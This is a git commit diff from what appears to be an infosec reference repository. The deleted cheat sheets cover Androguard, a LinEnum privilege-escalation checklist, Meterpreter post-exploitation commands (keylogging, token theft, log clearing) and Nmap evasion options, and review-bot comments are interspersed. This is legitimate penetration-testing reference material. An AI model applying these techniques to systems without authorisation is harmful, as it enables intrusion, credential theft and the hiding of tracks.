
Fixed some stuff

pull/11/head
Robert Musser, 4 years ago
commit 5cc3c33838
49 changed files with 502 additions and 3467 deletions
1. +1 -1 Draft/ATT&CK-Stuff/Exfiltration.md
2. +1 -1 Draft/ATT&CK-Stuff/Privilege_Escalation.md
3. +17 -0 Draft/ATT&CK-Stuff/README.md
4. +0 -307 Draft/Cheat sheets reference pages Checklists -/Androguard.txt
5. +0 -11 Draft/Cheat sheets reference pages Checklists -/Curl.txt
6. +0 -0 Draft/Cheat sheets reference pages Checklists -/Linux/Linux.rtf
7. +0 -60 Draft/Cheat sheets reference pages Checklists -/Linux/System Enumeration.txt
8. +0 -112 Draft/Cheat sheets reference pages Checklists -/Metasploit.txt
9. +0 -0 Draft/Cheat sheets reference pages Checklists -/Meterpreter Scripts and Description.txt
10. +3 -0 Draft/Cheat sheets reference pages Checklists -/Ncat.txt
11. +122 -0 Draft/Cheat sheets reference pages Checklists -/Nmap Cheat Sheet.md
12. +0 -119 Draft/Cheat sheets reference pages Checklists -/Nmap Cheat Sheet.txt
13. +305 -190 Draft/Cheat sheets reference pages Checklists -/Radare2.md
14. +0 -0 Draft/Cheat sheets reference pages Checklists -/Random Shit/detect_virtual_box_c_prog.txt
15. +0 -1 Draft/Cheat sheets reference pages Checklists -/SQLMap Cheat Sheet.txt
16. +0 -57 Draft/Cheat sheets reference pages Checklists -/TCPDump.txt
17. +0 -3 Draft/Cheat sheets reference pages Checklists -/ToDO.txt
18. +0 -98 Draft/Cheat sheets reference pages Checklists -/WebApp Exploitation Cheat Sheet.txt
19. +0 -35 Draft/Cheat sheets reference pages Checklists -/Windows/Windows System Enumeration.txt
20. +0 -0 Draft/Cheat sheets reference pages Checklists -/Windows/Windows.rtf
21. +2 -0 Draft/Cheat sheets reference pages Checklists -/list_of_emoji.md
22. +0 -0 Draft/Cheat sheets reference pages Checklists -/metasploit.md
23. +0 -111 Draft/Cheat sheets reference pages Checklists -/sqli cheat.txt
24. +0 -69 Draft/Counter_Surveillance.md
25. +0 -19 Draft/Frameworks Methodologies/Metasploit Reference.txt
26. +0 -110 Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Discovery & Probing.txt
27. +0 -832 Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Enumeration.txt
28. +0 -315 Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Network Footprinting.txt
29. +0 -0 Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/PTES - Penetration Testing Execution Standard.rtf
30. +0 -29 Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Password Cracking.txt
31. +0 -73 Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Penetration.txt
32. +0 -128 Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/VoIP Security.txt
33. +0 -67 Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Vulnerability Assessment.txt
34. +0 -231 Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Wireless Penetration.txt
35. +0 -271 Draft/Frameworks Methodologies/Post Exploitation with Metasploit.txt
36. +0 -0 Draft/Rants&Writeups/Gamma_group_hack_writeup.txt
37. +0 -0 Draft/Rants&Writeups/Hacking Team Writeup.md
38. +0 -0 Draft/Rants&Writeups/Opsec_rant-alpraking.md
39. +0 -0 Draft/Rants&Writeups/Opsec_rant2-nachash.md
40. +28 -18 Draft/Red-Teaming.md
41. +0 -53 Draft/Securing Hardening_1/Cull.txt
42. +0 -26 Draft/Securing Hardening_1/Finding Rootkits.txt
43. +0 -42 Draft/Securing Hardening_1/List of Guides.txt
44. +0 -1 Draft/Securing Hardening_1/Reference List.txt
45. +0 -21 Draft/Securing Hardening_1/Securing Browsers.txt
46. +0 -0 Draft/Securing Hardening_1/Securing Hardening_1.rtf
47. +5 -22 Draft/Securing Hardening_1/Securing Windows Desktop.txt
48. +2 -4 Draft/help.md
49. +16 -30 README.md

+1 -1 Draft/ATT&CK-Stuff/Exfiltration.md

@ -1,6 +1,6 @@
# Exfiltration
-------------------------------
See --> [Exfiltration](../../Exfiltration.md)
See --> [Exfiltration](https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/Exfiltration.md)


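Review bot: the replacement link `See --> [Exfiltration](https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/Exfiltration.md)` hardcodes the upstream repository and the master branch, so it breaks on forks, feature branches and offline clones. The old relative link `../../Exfiltration.md` was wrong for a different reason: from Draft/ATT&CK-Stuff/ it resolves to the repository root, while the new URL itself places the target at Draft/Exfiltration.md. A relative `../Exfiltration.md` fixes both problems and stays portable.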
+1 -1 Draft/ATT&CK-Stuff/Privilege_Escalation.md

@ -1,4 +1,4 @@
# Windows Privlege Escalation
# Privlege Escalation
[MITRE ATT&CK - Privilege Escalation](https://attack.mitre.org/wiki/Privilege_Escalation)


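Review bot: the new heading `# Privlege Escalation` carries over the typo from `# Windows Privlege Escalation`; since the heading is being rewritten anyway, spell it `# Privilege Escalation`, matching the file name and the MITRE link text on the following line.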
+17 -0 Draft/ATT&CK-Stuff/README.md

@ -0,0 +1,17 @@
#### MITRE ATT&CK Framework Mappings
---------------------------
* MITRE ATT&CK Framework ([MITRE ATT&CK Framework](https://attack.mitre.org/wiki/Main_Page)) for attackers.
* This is a copy of the mappings with links to techniques and background information rather than APT reports.
* If you want to test your defenses against a lot of these things:
* [Atomic Red Team - Small and highly portable detection tests mapped to the Mitre ATT&CK Framework.](https://github.com/redcanaryco/atomic-red-team)
* [Collection](https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/ATT%26CK-Stuff/Collection.md)
* [Command and Control](https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/ATT%26CK-Stuff/Command_and_Control.md)
* [Credential Access](https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/ATT%26CK-Stuff/Command_and_Control.md)
* [Defense Evasion](https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/ATT%26CK-Stuff/Defense_Evasion.md)
* [Discovery](https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/ATT%26CK-Stuff/Discovery.md)
* [Execution](https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/ATT%26CK-Stuff/Execution.md)
* [Exfiltration](https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/ATT%26CK-Stuff/Exfiltration.md)
* [Lateral Movement](https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/ATT%26CK-Stuff/Lateral%20Movement.md)
* [Persistence](https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/ATT%26CK-Stuff/Persistence.md)
* [Privilege Escalation](https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/ATT%26CK-Stuff/Privilege_Escalation.md)

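Review bot: the Credential Access entry points at the wrong file: `* [Credential Access](.../Draft/ATT%26CK-Stuff/Command_and_Control.md)` is a copy-paste of the line above it and should link to the Credential Access page instead (presumably Credential_Access.md, following the naming of the sibling entries). Two smaller points in the same list: every entry is an absolute URL to blob/master on the upstream repository, so this index breaks on forks, branches and local clones, whereas plain relative links (`Collection.md`, `Command_and_Control.md`, ...) work everywhere; and `Lateral%20Movement.md` is the only target whose name uses a space rather than an underscore, which is worth normalising while the index is new.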
+0 -307 Draft/Cheat sheets reference pages Checklists -/Androguard.txt

@ -1,307 +0,0 @@
USAGE
Androaxml
Androapkinfo
Androcsign
Androdd
Androdiff
Androdump
Androgexf
Androlyze
Andromercury
Androrisk
Androsign
Androsim
Androxgmml
Apkviewer
USAGE
Androaxml
BlogPost1
You can used it to transform Android's binary XML (eg: AndroidManifest.xml) into classic xml (human readable ;)).
$ ./androaxml.py -h
Usage: androaxml.py [options]
Options:
-h, --help show this help message and exit
-i INPUT, --input=INPUT
filename input (APK or android's binary xml)
-o OUTPUT, --output=OUTPUT
filename output of the xml
-v, --version version of the API
$ ./androaxml.py -i yourfile.apk -o output.xml
$ ./androaxml.py -i AndroidManifest.xml -o output.xml
Androapkinfo
This tool displays information on a given APK:
permissions
services
activities
receivers
usage of native code
usage of native code
axelle$ ./androapkinfo.py -i qicsomos.apk
FILES:
META-INF/MANIFEST.MF META-INF/MANIFEST.MF -7eb55c04
res/layout/main.xml res/layout/main.xml 54a83b5b
AndroidManifest.xml AndroidManifest.xml 2eef2f86
res/drawable-mdpi/ic_launcher.png res/drawable-mdpi/ic_launcher.png -22437ab
res/drawable-hdpi/ic_launcher.png res/drawable-hdpi/ic_launcher.png -4e108fda
META-INF/PLATFORM.RSA META-INF/PLATFORM.RSA 5c8d71d3
META-INF/PLATFORM.SF META-INF/PLATFORM.SF 5b48f7ec
resources.arsc resources.arsc -55923b8c
classes.dex classes.dex -bafd464
res/drawable-ldpi/ic_launcher.png res/drawable-ldpi/ic_launcher.png -6272d259
PERMISSIONS:
android.permission.SEND_SMS ['dangerous', 'send SMS messages', 'Allows application to send SMS messages. Malicious applications may cost you money by sending messages without your confirmation.']
android.permission.READ_LOGS ['dangerous', 'read sensitive log data', "Allows an application to read from the system's various log files. This allows it to discover general information about what you are doing with the phone, potentially including personal or private information."]
MAIN ACTIVITY: org.projectvoodoo.simplecarrieriqdetector.Main
ACTIVITIES: ['org.projectvoodoo.simplecarrieriqdetector.Main']
SERVICES: []
RECEIVERS: []
PROVIDERS: []
Native code: False
Dynamic code: False
Reflection code: False
Androcsign
This tool helps you to create your own signatures in order to add them in the database. In fact, it's more easy after an analysis to isolate which parts are the more interesting to add in the database in order to detect the malware (and variants). So, the idea is to describe your signature of a malware in a json format file to add this signature to the database.
desnos@destiny:~/androguard$ ./androcsign.py -h
Usage: androcsign.py [options]
Options:
-h, --help show this help message and exit
-i INPUT, --input=INPUT
file : use this filename
-r REMOVE, --remove=REMOVE
remote the signature
-o OUTPUT, --output=OUTPUT
output database
-l LIST, --list=LIST list signatures in database
-c CHECK, --check=CHECK
check signatures in database
-v, --version version of the API
The input file is a classical json format :
[ { "SAMPLE" : "apks/malwares/DroidDream/Magic Hypnotic Spiral.apk" }, { "BASE" : "AndroidOS", "NAME" : "DroidDream", "SIGNATURE" : [ { "TYPE" : "METHSIM", "CN" : "Lcom/android/root/Setting;", "MN" : "postUrl", "D" : "(Ljava/lang/String; Landroid/content/Context;)V" } ], "BF" : "0" } ]
where SAMPLE is the file where signatures will be extracted. NAME is the name of your signature. And SIGNATURE is a list of dictionnary which describes all sub-signatures.
A sub-signature can be a :
METHSIM : CN is the classname, NM is the method name, and D is the descriptor CLASSSIM : CN is the classname So a sub-signature can be apply on a specific method or directly on an entire class.
BF is the boolean formula of the whole signature, so it's possible to mix different sub-signatures.
When the sub-signature is added to the database, the engine will keep only interesting information :
entropies of general signature, android packages, java packages, binary raw, and exceptions. These entropies are using to clustering sub-signatures and compare items : it is these values that which will be used to apply clustering, value of the general signature : it is this value that which will be used to apply similarity distance on each required cluster. In the previous output, we isolated one method (postUrl) in an application (droiddream malware) to create a new signature. Androcsign will extract useful information of this application to add the signature in the database :
desnos@destiny:~/androguard$ ./androcsign.py -i signatures/droiddream.sign -o signatures/dbandroguard
[{u'DroidDream': [[[0, 'QltTUDBQMVNTUDJQMlAwRjBQMVAxU1AxRjBQMVAxUDFQMVAxUDJQMFAxUDFQMVAxU1AxUDFQMFAxXUJbUDFJUDFdQltQMV
Androdd
This tool is used to output graphs for each method of each class of an Android package.
$ ./androdd.py --help
Usage: androdd.py [options]
Options:
-h, --help show this help message and exit
-i INPUT, --input=INPUT
file : use this filename
-o OUTPUT, --output=OUTPUT
base directory to output all files
-d, --dot write the method in dot format
-f FORMAT, --format=FORMAT
write the method in specific format (png, ...)
-v, --version version of the API
input: an Android APK or classes.dex
output directory is mandatory, or the tool does not output anything.
output formats: PNG, JPG.
if you wish both DOT and PNG output for ex, mix options -d and -f PNG
Androdiff
The tool is used to compare/display the differences between two apps. The documentation is available here
Androdump
BlogPost1
You can used it to dump a linux process in order to get the original class files.
$ ./androdump.py -h
Usage: androdump.py [options]
Options:
-h, --help show this help message and exit
-i INPUT, --input=INPUT
pid
-v, --version version of the API
pouik@camelot:~/androguard$ ps aux |grep java
pouik 21008 0.1 0.5 673840 10688 pts/5 Sl+ 10:28 0:02 java Test2
pouik 21548 0.0 0.0 3060 812 pts/2 S+ 11:00 0:00 grep java
pouik@camelot:~/androguard$ ./androdump.py -i 21008
HEADER 0x6f990000-0x6fee0000 (rw-p)
Test2 ()V
Test2 get_x ()I
Test2 main ([Ljava/lang/String;)V
Test2bis ()V
Test2bis get_T ()Ljava/lang/String;
Androgexf
This tool outputs graphs using the GEXF format.
desnos@destiny:~/androguard$ ./androgexf.py -h
Usage: androgexf.py [options]
Options:
-h, --help show this help message and exit
-i INPUT, --input=INPUT
filename input (dex, apk)
-o OUTPUT, --output=OUTPUT
filename output of the xgmml
For instance,
desnos@destiny:~/androguard$ ./androgexf.py -i YOURAPP.apk -o YOURAPP.gexf
The output graph can be viewed using an external tool, named Gephi. For real examples of visualization of Android malware, please see this page.
Androlyze
Androlyze is a tool to analyze Android applications. The most common features are available via command line, the others via a Python interactive shell:
Usage: androlyze.py [options]
Options:
-h, --help show this help message and exit
-i INPUT, --input=INPUT
file : use this filename
-d, --display display the file in human readable format
-m METHOD, --method=METHOD
display method(s) respect with a regexp
-f FIELD, --field=FIELD
display field(s) respect with a regexp
-s, --shell open a shell to interact more easily with objects
-v, --version version of the API
-p, --pretty pretty print !
-t TYPE_PRETTY, --type_pretty=TYPE_PRETTY
set the type of pretty print (0, 1) !
-x, --xpermissions show paths of permissions
Using androlyze via the interactive shell opens up to tons of other features. Basically, all functions of the code are available that way:
./androlyze.py -s
Welcome to Androlyze ALPHA 0-update1
>>> j = JVMFormat( open("./VM.class").read() )
>>> j.show()
# Get specific methods
>>> x = j.get_method("<init>")[0]
>>> x.show()
# Change name
>>> x.set_name("toto")
# Save it
>>> fd = open("VM2.class", "w")
>>> fd.write(j.save())
>>> fd.close()
Andromercury
This tool links with the Mercury framework
See blog post
$ ./andromercury.py -h
Usage: andromercury.py [options]
Options:
-h, --help show this help message and exit
-l LIST, --list=LIST list all packages
-i INPUT, --input=INPUT
get specific packages (a filter)
-r REMOTEHOST, --remotehost=REMOTEHOST
specify ip of emulator/device
-p PORT, --port=PORT specify the port
-o OUTPUT, --output=OUTPUT
output directory to write packages
-b DATABASE, --database=DATABASE
database : use this database
-c CONFIG, --config=CONFIG
use this configuration
-v, --verbose display debug information
Androrisk
./androrisk.py -h
Usage: androrisk.py [options]
Options:
-h, --help show this help message and exit
-i INPUT, --input=INPUT
file : use these filenames
-a, --analysis perform analysis to calculate the risk
-m, --method perform analysis of each method
-d DIRECTORY, --directory=DIRECTORY
directory : use this directory
-v, --version version of the API
Androsign
Checks whether a given sample is listed in the database or not.
$ ./androsign.py -h
Usage: androsign.py [options]
Options:
-h, --help show this help message and exit
-i INPUT, --input=INPUT
file : use this filename
-d DIRECTORY, --directory=DIRECTORY
directory : use this directory
-b DATABASE, --database=DATABASE
database : use this database
-c CONFIG, --config=CONFIG
use this configuration
-v, --verbose display debug information
For example, see http://code.google.com/p/androguard/wiki/AndroidMalwareAnalysis:
$ ./androsign.py -d apks/malwares/foncy/ -b signatures/dbandroguard -c signatures/dbconfig
98a402d885cdb941dca8b45a4bbcbbe7f44ba62910d519bc1c2161dba117ebd2 : ----> Foncy
81dd17ea168cf884bfb5aebb7cd2241a5624d1ae14444594bf7677e1080339f9 : ----> Foncy
d9ef940236f285548a60be0d575d7bba4587bdfc3f6c56f38b5da601686344a9 : ----> Foncy
SuiConFo 1.26.apk : ----> None
127sc.apk : ----> None
Androsim
The tool is used to get the similarities between two apps. The documentation is available here
axelle@caiman:~/softs/androguard$ ./androsim.py -h
Usage: androsim.py [options]
Options:
-h, --help show this help message and exit
-i INPUT, --input=INPUT
file : use these filenames
-t THRESHOLD, --threshold=THRESHOLD
define the threshold
-c COMPRESSOR, --compressor=COMPRESSOR
define the compressor
-d, --display display all information about methods
-n, --new don't calculate the similarity score with new methods
-e EXCLUDE, --exclude=EXCLUDE
exclude specific class name (python regexp)
-s SIZE, --size=SIZE exclude specific method below the specific size
-x, --xstrings display similarities of strings
-v, --version version of the API
-l LIBRARY, --library=LIBRARY
use python library (python) or specify the path of the
shared library)
Androxgmml
BlogPost1
You can used it to transform an apk/jar/class/dex files format into an xgmml graph which represent the control flow graph or the functions call.
$ ./androxgmml.py -h
Usage: androxgmml.py [options]
Options:
-h, --help show this help message and exit
-i INPUT, --input=INPUT
filename input
-o OUTPUT, --output=OUTPUT
filename output of the xgmml
-f, --functions include function calls
-e, --externals include extern function calls
-v, --version version of the API
./androxgmml.py -i myapp.jar -o output.xgmml
./androxgmml.py -i myapp.apk -o output.xgmml
./androxgmml.py -i myclass.class -o output.xgmml
./androxgmml.py -i mydex.dex -o output.xgmml
# with functions call :
./androxgmml.py -i myapp.jar -f -o output.xgmml
# with external function calls
./androxgmml.py -i myapp.jar -e -o output.xgmml
# with both
./androxgmml.py -i myapp.jar -e -f -o output.xgmml
Apkviewer
./apkviewer.py -h
Usage: apkviewer.py [options]
Options:
-h, --help show this help message and exit
-i INPUT, --input=INPUT
filename input (dex, apk)
-o OUTPUT, --output=OUTPUT
directory output

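Review bot: this hunk drops the entire Androguard reference (307 lines covering androaxml, androapkinfo, androcsign, androlyze and the rest) and nothing in the changed-file list adds an Androguard page in its place, while the commit message `Fixed some stuff` does not say whether the removal is deliberate. If the material was culled on purpose, say so in the message; if it was meant to be migrated to Markdown like the Nmap and Radare2 sheets in this same commit, the rename or new file is missing.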
+0 -11 Draft/Cheat sheets reference pages Checklists -/Curl.txt

@ -1,11 +0,0 @@
Curl
About Curl
Taken from: http://curl.haxx.se/docs/manpage.html
Curl is a tool to transfer data from or to a server, using one of the supported protocols (DICT, FILE, FTP, FTPS, GOPHER, HTTP, HTTPS, IMAP, IMAPS, LDAP, LDAPS, POP3, POP3S, RTMP, RTSP, SCP, SFTP, SMTP, SMTPS, TELNET and TFTP). The command is designed to work without user interaction.
curl offers a busload of useful tricks like proxy support, user authentication, FTP upload, HTTP post, SSL connections, cookies, file transfer resume, Metalink, and more.
Scripting

+0 -0 Draft/Cheat sheets reference pages Checklists -/Linux/Linux.rtf


+0 -60 Draft/Cheat sheets reference pages Checklists -/Linux/System Enumeration.txt

@ -1,60 +0,0 @@
LinEnum: https://github.com/rebootuser/LinEnum
High-level summary of the checks/tasks performed by LinEnum:
Kernel and distribution release details
System Information:
Hostname
Networking details:
Current IP
Default route details
DNS server information
User Information:
Current user details
Last logged on users
List all users including uid/gid information
List root accounts
Extracts password policies and hash storage method information
Checks umask value
Checks if password hashes are stored in /etc/passwd
Extract full details for ‘default’ uid’s such as 0, 1000, 1001 etc
Attempt to read restricted files i.e. /etc/shadow
List current users history files (i.e .bash_history, .nano_history etc.)
Basic SSH checks
Privileged access:
Determine if /etc/sudoers is accessible
Determine if the current user has Sudo access without a password
Are known ‘good’ breakout binaries available via Sudo (i.e. nmap, vim etc.)
Is root’s home directory accessible
List permissions for /home/
Environmental:
Display current $PATH
Jobs/Tasks:
List all cron jobs
Locate all world-writable cron jobs
Locate cron jobs owned by other users of the system
Services:
List network connections (TCP & UDP)
List running processes
Lookup and list process binaries and associated permissions
List inetd.conf/xined.conf contents and associated binary file permissions
List init.d binary permissions
Version Information (of the following):
Sudo
MYSQL
Postgres
Apache
Checks user config
Default/Weak Credentials:
Checks for default/weak Postgres accounts
Checks for default/weak MYSQL accounts
Searches:
Locate all SUID/GUID files
Locate all world-writable SUID/GUID files
Locate all SUID/GUID files owned by root
Locate ‘interesting’ SUID/GUID files (i.e. nmap, vim etc)
List all world-writable files
Find/list all accessible *.plan files and display contents
Find/list all accessible *.rhosts files and display contents
Show NFS server details
Locate *.conf and *.log files containing keyword supplied at script runtime
List all *.conf files located in /etc
Locate mail

+0 -112 Draft/Cheat sheets reference pages Checklists -/Metasploit.txt

@ -1,112 +0,0 @@
Metasploit Reference
*The* Guide to Metasploit
http://www.offensive-security.com/metasploit-unleashed/Main_Page
Metasploit: Penetration Tester’s Guide Book
http://www.nostarch.com/metasploit
http://pentestlab.wordpress.com/2012/03/13/msfconsole-commands-cheat-sheet/
CMD Cheat Sheet
http://ultimatepeter.com/how-to-hack-ultimate-metasploit-meterpreter-command-cheat-sheet/
Meterpreter CMD Reference
http://www.offensive-security.com/metasploit-unleashed/Meterpreter_Basics
Video training series for Metasploit(free)
http://www.securitytube.net/groups?operation=view&groupId=10
Using the Metasploit Framework
https://wiki.archlinux.org/index.php/Metasploit_Framework#Usage
Metasploit Commands
? - help menu
background - moves the current session to the background
bgkill - kills a background meterpreter script
bglist - provides a list of all running background scripts
bgrun - runs a script as a background thread
channel - displays active channels
close - closes a channel
exit - terminates a meterpreter session
help - help menu
interact - interacts with a channel
irb - go into Ruby scripting mode
migrate - moves the active process to a designated PID
quit - terminates the meterpreter session
read - reads the data from a channel
run - executes the meterpreter script designated after it
use - loads a meterpreter extension
write - writes data to a channel
File System Commands
cat - read and output to stdout the contents of a file
cd - change directory on the victim
del - delete a file on the victim
download - download a file from the victim system to the attacker system
edit - edit a file with vim
getlwd - print the local directory
getwd - print working directory
lcd - change local directory
lpwd - print local directory
ls - list files in current directory
mkdir - make a directory on the victim system
pwd - print working directory
rm - delete a file
rmdir - remove directory on the victim system
upload - upload a file from the attacker system to the victim
Networking Commands
ipconfig - displays network interfaces with key information including IP address, etc.
portfwd - forwards a port on the victim system to a remote service
route - view or modify the victim routing table
System Commands
clearav - clears the event logs on the victim's computer
drop_token - drops a stolen token
execute - executes a command
getpid - gets the current process ID (PID)
getprivs - gets as many privileges as possible
getuid - get the user that the server is running as
kill - terminate the process designated by the PID
ps - list running processes
reboot - reboots the victim computer
reg - interact with the victim's registry
rev2self - calls RevertToSelf() on the victim machine
shell - opens a command shell on the victim machine
shutdown - shuts down the victim's computer
steal_token - attempts to steal the token of a specified (PID) process
sysinfo - gets the details about the victim computer such as OS and name
User Interface Commands
enumdesktops - lists all accessible desktops
getdesktop - get the current meterpreter desktop
idletime - checks to see how long since the victim system has been idle
keyscan_dump - dumps the contents of the software keylogger
keyscan_start - starts the software keylogger when associated with a process such as Word or browser
keyscan_stop - stops the software keylogger
screenshot - grabs a screenshot of the meterpreter desktop
set_desktop - changes the meterpreter desktop
uictl - enables control of some of the user interface components
Privilege Escalation Commands
getsystem - uses 15 built-in methods to gain sysadmin privileges

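Review bot: the changed-file list shows `metasploit.md` with +0 -0, so it is not clear whether the content deleted here was carried over or simply dropped; the commit message does not say. If it survives anywhere, fix it while moving it: the list under `Metasploit Commands` is Meterpreter's session command set, not msfconsole's (its own entries say `exit - terminates a meterpreter session`), `clearav - clears the event logs on the victim's computer` misspells the command, which is `clearev`, and `getsystem - uses 15 built-in methods` overstates what getsystem offers, which is a small handful of techniques.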
Draft/Frameworks Methodologies/Meterpreter Scripts and Description.txt → Draft/Cheat sheets reference pages Checklists -/Meterpreter Scripts and Description.txt


+3 -0 Draft/Cheat sheets reference pages Checklists -/Ncat.txt

@ -2,6 +2,9 @@ Ncat
Ncat is a piece of software created by the same person who made Nmap, Fyodor, as an upgrade to netcat.
http://alexcreek.com/ncat-cheatsheet.html
https://bitrot.sh/cheatsheet/19-12-2017-ncat/


Draft/Cheat sheets reference pages Checklists -/Nmap.txt → Draft/Cheat sheets reference pages Checklists -/Nmap Cheat Sheet.md


+0 -119 Draft/Cheat sheets reference pages Checklists -/Nmap Cheat Sheet.txt

@ -1,119 +0,0 @@
CheatSheet: Nmap Cheat Sheet
Basic Scanning Techniques
Scan a single target —> nmap [target]
Scan multiple targets —> nmap [target1,target2,etc]
Scan a list of targets —-> nmap -iL [list.txt]
Scan a range of hosts —-> nmap [range of IP addresses]
Scan an entire subnet —-> nmap [IP address/cdir]
Scan random hosts —-> nmap -iR [number]
Excluding targets from a scan —> nmap [targets] –exclude [targets]
Excluding targets using a list —> nmap [targets] –excludefile [list.txt]
Perform an aggressive scan —> nmap -A [target]
Scan an IPv6 target —> nmap -6 [target]
Discovery Options
Perform a ping scan only —> nmap -sP [target]
Don’t ping —> nmap -PN [target]
TCP SYN Ping —> nmap -PS [target]
TCP ACK ping —-> nmap -PA [target]
UDP ping —-> nmap -PU [target]
SCTP Init Ping —> nmap -PY [target]
ICMP echo ping —-> nmap -PE [target]
ICMP Timestamp ping —> nmap -PP [target]
ICMP address mask ping —> nmap -PM [target]
IP protocol ping —-> nmap -PO [target]
ARP ping —> nmap -PR [target]
Traceroute —> nmap –traceroute [target]
Force reverse DNS resolution —> nmap -R [target]
Disable reverse DNS resolution —> nmap -n [target]
Alternative DNS lookup —> nmap –system-dns [target]
Manually specify DNS servers —> nmap –dns-servers [servers] [target]
Create a host list —-> nmap -sL [targets]
Advanced Scanning Options
TCP SYN Scan —> nmap -sS [target]
TCP connect scan —-> nmap -sT [target]
UDP scan —-> nmap -sU [target]
TCP Null scan —-> nmap -sN [target]
TCP Fin scan —> nmap -sF [target]
Xmas scan —-> nmap -sX [target]
TCP ACK scan —> nmap -sA [target]
Custom TCP scan —-> nmap –scanflags [flags] [target]
IP protocol scan —-> nmap -sO [target]
Send Raw Ethernet packets —-> nmap –send-eth [target]
Send IP packets —-> nmap –send-ip [target]
Port Scanning Options
Perform a fast scan —> nmap -F [target]
Scan specific ports —-> nmap -p [ports] [target]
Scan ports by name —-> nmap -p [port name] [target]
Scan ports by protocol —-> nmap -sU -sT -p U:[ports],T:[ports] [target]
Scan all ports —-> nmap -p “*” [target]
Scan top ports —–> nmap –top-ports [number] [target]
Perform a sequential port scan —-> nmap -r [target]
Version Detection
Operating system detection —-> nmap -O [target]
Submit TCP/IP Fingerprints —-> http://www.nmap.org/submit/
Attempt to guess an unknown —-> nmap -O –osscan-guess [target]
Service version detection —-> nmap -sV [target]
Troubleshooting version scans —-> nmap -sV –version-trace [target]
Perform a RPC scan —-> nmap -sR [target]
Timing Options
Timing Templates —-> nmap -T [0-5] [target]
Set the packet TTL —-> nmap –ttl [time] [target]
Minimum of parallel connections —-> nmap –min-parallelism [number] [target]
Maximum of parallel connection —-> nmap –max-parallelism [number] [target]
Minimum host group size —–> nmap –min-hostgroup [number] [targets]
Maximum host group size —-> nmap –max-hostgroup [number] [targets]
Maximum RTT timeout —–> nmap –initial-rtt-timeout [time] [target]
Initial RTT timeout —-> nmap –max-rtt-timeout [TTL] [target]
Maximum retries —-> nmap –max-retries [number] [target]
Host timeout —-> nmap –host-timeout [time] [target]
Minimum Scan delay —-> nmap –scan-delay [time] [target]
Maximum scan delay —-> nmap –max-scan-delay [time] [target]
Minimum packet rate —-> nmap –min-rate [number] [target]
Maximum packet rate —-> nmap –max-rate [number] [target]
Defeat reset rate limits —-> nmap –defeat-rst-ratelimit [target]
Firewall Evasion Techniques
Fragment packets —-> nmap -f [target]
Specify a specific MTU —-> nmap –mtu [MTU] [target]
Use a decoy —-> nmap -D RND: [number] [target]
Idle zombie scan —> nmap -sI [zombie] [target]
Manually specify a source port —-> nmap –source-port [port] [target]
Append random data —-> nmap –data-length [size] [target]
Randomize target scan order —-> nmap –randomize-hosts [target]
Spoof MAC Address —-> nmap –spoof-mac [MAC|0|vendor] [target]
Send bad checksums —-> nmap –badsum [target]
Output Options
Save output to a text file —-> nmap -oN [scan.txt] [target]
Save output to a xml file —> nmap -oX [scan.xml] [target]
Grepable output —-> nmap -oG [scan.txt] [target]
Output all supported file types —-> nmap -oA [path/filename] [target]
Periodically display statistics —-> nmap –stats-every [time] [target]
133t output —-> nmap -oS [scan.txt] [target]
Troubleshooting and debugging
Help —> nmap -h
Display Nmap version —-> nmap -V
Verbose output —-> nmap -v [target]
Debugging —-> nmap -d [target]
Display port state reason —-> nmap –reason [target]
Only display open ports —-> nmap –open [target]
Trace packets —> nmap –packet-trace [target]
Display host networking —> nmap –iflist
Specify a network interface —> nmap -e [interface] [target]
Nmap Scripting Engine
Execute individual scripts —> nmap –script [script.nse] [target]
Execute multiple scripts —-> nmap –script [expression] [target]
Script categories —-> all, auth, default, discovery, external, intrusive, malware, safe, vuln
Execute scripts by category —-> nmap –script [category] [target]
Execute multiple scripts categories —-> nmap –script [category1,category2, etc]
Troubleshoot scripts —-> nmap –script [script] –script-trace [target]
Update the script database —-> nmap –script-updatedb
Ndiff
Comparison using Ndiff —-> ndiff [scan1.xml] [scan2.xml]
Ndiff verbose mode —-> ndiff -v [scan1.xml] [scan2.xml]
XML output mode —-> ndiff –xml [scan1.xm] [scan2.xml]

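Review bot: this sheet is deleted while `Nmap.txt` is renamed to `Nmap Cheat Sheet.md` in the same commit, so the two were presumably merged; make sure the mistakes in this copy did not travel with the content. The two timing entries `Maximum RTT timeout —–> nmap –initial-rtt-timeout [time] [target]` and `Initial RTT timeout —-> nmap –max-rtt-timeout [TTL] [target]` have their labels swapped (and the second takes a time, not a TTL); `-PN` is the old spelling of `-Pn`; `-sR` (RPC scan) is an alias for `-sV` in current Nmap; and every long option has lost its double dash (`–exclude`, `–traceroute`, `–script`), most likely a smart-dash conversion that will break copy-paste if it is in the .md file too.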
Draft/Cheat sheets reference pages Checklists -/Radare2.txt → Draft/Cheat sheets reference pages Checklists -/Radare2.md


Draft/detect_virtual_box_c_prog.txt → Draft/Cheat sheets reference pages Checklists -/Random Shit/detect_virtual_box_c_prog.txt


+0 -1 Draft/Cheat sheets reference pages Checklists -/SQLMap Cheat Sheet.txt

@ -1 +0,0 @@

+0 -57 Draft/Cheat sheets reference pages Checklists -/TCPDump.txt

@ -1,57 +0,0 @@
TCPDump:
SANS TCPDump reference
https://www.sans.org/security-resources/tcpip.pdf
Cheat Sheet reference guide
http://packetlife.net/media/library/12/tcpdump.pdf
Excellent TCPDump Reference Guide
http://danielmiessler.com/study/tcpdump/
Sample commands:
Port Ranges // see traffic to any port in a range
tcpdump port range 21-23
